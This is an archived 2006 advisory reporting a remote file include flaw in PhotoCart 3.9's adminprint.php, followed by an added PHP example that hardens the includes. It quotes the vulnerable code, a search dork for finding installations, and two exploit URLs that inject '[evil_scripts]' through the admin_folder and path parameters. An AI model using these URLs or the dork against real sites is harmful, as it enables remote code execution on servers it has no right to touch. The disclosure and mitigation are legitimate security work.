Computer Security
[EN] securityvulns.ru

From: irvian <irvian_yoe_(at)_yahoo.com>
Date: 22.11.2006
Subject: PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability

#####################################################################################################
#
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Script site: http://www.picturespro.com/store/programs/129-photo_cart.html
# Dork       : inurl :/PhotoCart/
#
#####################################################################################################
##
##
## Bug Found By : irvian
##
##
#####################################################################################################
###
### GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid
### Special greetz: #patihack #hitamputih #nyubicrew
###
#####################################################################################################

bug found on /PhotoCart/adminprint.php

include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
   adminsessionCheck();


Expl: http://www.site.com/PhotoCart/adminprint.php?admin_folder=[evil_scripts]
     http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]
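
A hardened form of the include preamble quoted above, as an added example that is not part of the original advisory and not PhotoCart's own code: the include directories become constants derived from the script's location instead of variables a request can reach, and each include path is resolved and checked before use. The constant names, the helper pc_local_path() and the "admin" directory layout are assumptions; the file names are the ones in the excerpt.

```php
<?php
// Added example, not PhotoCart's code. Constant names, pc_local_path() and
// the "admin" directory are assumptions; file names come from the excerpt.
//
// php.ini settings that close the remote-include path independently:
//   register_globals  = Off   (removed entirely in PHP 5.4)
//   allow_url_include = Off   (available since PHP 5.2)

// Derive both directories from this script's location. Constants cannot be
// overwritten by request parameters, unlike $admin_folder and $path.
define('PC_BASE_DIR',  __DIR__);
define('PC_ADMIN_DIR', __DIR__ . DIRECTORY_SEPARATOR . 'admin');

/**
 * Return the canonical path of $file inside $baseDir, or stop the request.
 * realpath() yields false for URLs, stream wrappers and missing files, and
 * the prefix check rejects anything that resolves outside $baseDir.
 */
function pc_local_path($baseDir, $file)
{
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $file);

    if ($base === false || $full === false
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($full)) {
        header('HTTP/1.1 500 Internal Server Error');
        error_log('Rejected include: ' . $baseDir . '/' . $file);
        exit('Configuration error');
    }
    return $full;
}

// require at file scope so variables set by the included files stay global,
// as they were in the original preamble.
require pc_local_path(PC_BASE_DIR,  'setup.php');
require pc_local_path(PC_ADMIN_DIR, '_admin_functions.php');
require pc_local_path(PC_BASE_DIR,  '_db.php');

adminsessionCheck();
```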
